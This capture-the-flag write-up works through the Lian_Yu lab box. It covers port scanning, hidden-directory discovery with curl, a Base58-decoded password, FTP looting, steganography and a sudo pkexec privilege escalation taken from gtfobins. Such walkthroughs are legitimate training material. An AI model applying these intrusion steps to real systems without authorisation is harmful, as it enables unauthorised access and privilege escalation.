Lian_Yu
Fuzzing endpoints - Base58 decryption - FTP enumeration - Steg Tools - pkexec privesc
Recon
The box has two open ports
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 43835/tcp6 status
| 100024 1 48319/udp status
| 100024 1 57610/udp6 status
|_ 100024 1 58608/tcp status
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
A first gobuster scan reveals a hidden
island
directory
$ curl -s http://10.10.222.216/island/
<!DOCTYPE html>
<html>
<body>
<style>
</style>
<h1> Ohhh Noo, Don't Talk............... </h1>
<p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! -->
<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>
</body>
</html>
Reveals us a potential username
vigilante
, another deep dirsearch scan reveals another directory/2100
$ curl -s http://10.10.222.216/island/2100/
<!DOCTYPE html>
<html>
<body>
<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>
<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how? -->
</header>
</body>
</html>
Here's there a hint saying we can avail our
.ticket
here - which means there is a .ticket extension in the medium.txt you can simply grep it or run the gobuster tool to find the file -green_arrow.ticket
, This pages leads to :
$ curl -s http://10.10.97.18/island/2100/green_arrow.ticket
This is just a token to get into Queen's Gambit(Ship)
RTy8yhBQdscX
The string is
base58
encoded and we have a valid username -vigiliante
:!#th3h00d
Enumeration
Logging onto the FTP server with these credentials we get
$ ftp 10.10.97.18
Connected to 10.10.97.18 (10.10.97.18).
220 (vsFTPd 3.0.2)
Name (10.10.97.18:unknown): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
227 Entering Passive Mode (10,10,97,18,83,105).
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 May 05 11:10 .
drwxr-xr-x 4 0 0 4096 May 01 05:38 ..
-rw------- 1 1001 1001 44 May 01 07:13 .bash_history
-rw-r--r-- 1 1001 1001 220 May 01 05:38 .bash_logout
-rw-r--r-- 1 1001 1001 3515 May 01 05:38 .bashrc
-rw-r--r-- 1 0 0 2483 May 01 07:07 .other_user
-rw-r--r-- 1 1001 1001 675 May 01 05:38 .profile
-rw-r--r-- 1 0 0 511720 May 01 03:26 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 11:10 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 03:25 aa.jpg
226 Directory send OK.
ftp> get .other_user
local: .other_user remote: .other_user
227 Entering Passive Mode (10,10,97,18,61,173).
150 Opening BINARY mode data connection for .other_user (2483 bytes).
226 Transfer complete.
2483 bytes received in 0.0029 secs (857.39 Kbytes/sec)
ftp> mget *
Analysing the
*.png
files discloses us a passphrase - Crack it using steg tools and the.other_user
text file discloses us a potential username calledslade
$ cat .other_user
Slade Wilson was 16 years old when he enlisted in the United States Army, having lied about his age. After serving a stint in Korea, he was later assigned to Camp Washington where he had been promoted to the rank of major. In the early 1960s, he met Captain Adeline Kane, who was tasked with training
Once we find the passphrase we can use it to extract
ss.zip
$ unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
$ cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
$ cat shado
M3tahuman
Now log on to the SSH service using the above credentials - grab the
user.txt
Privilege Escalation
Listing the sudo permissions using the
sudo -l
command
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
Fire up gtfobins and search for pkexec binary - Grab the
root
flag !
Last updated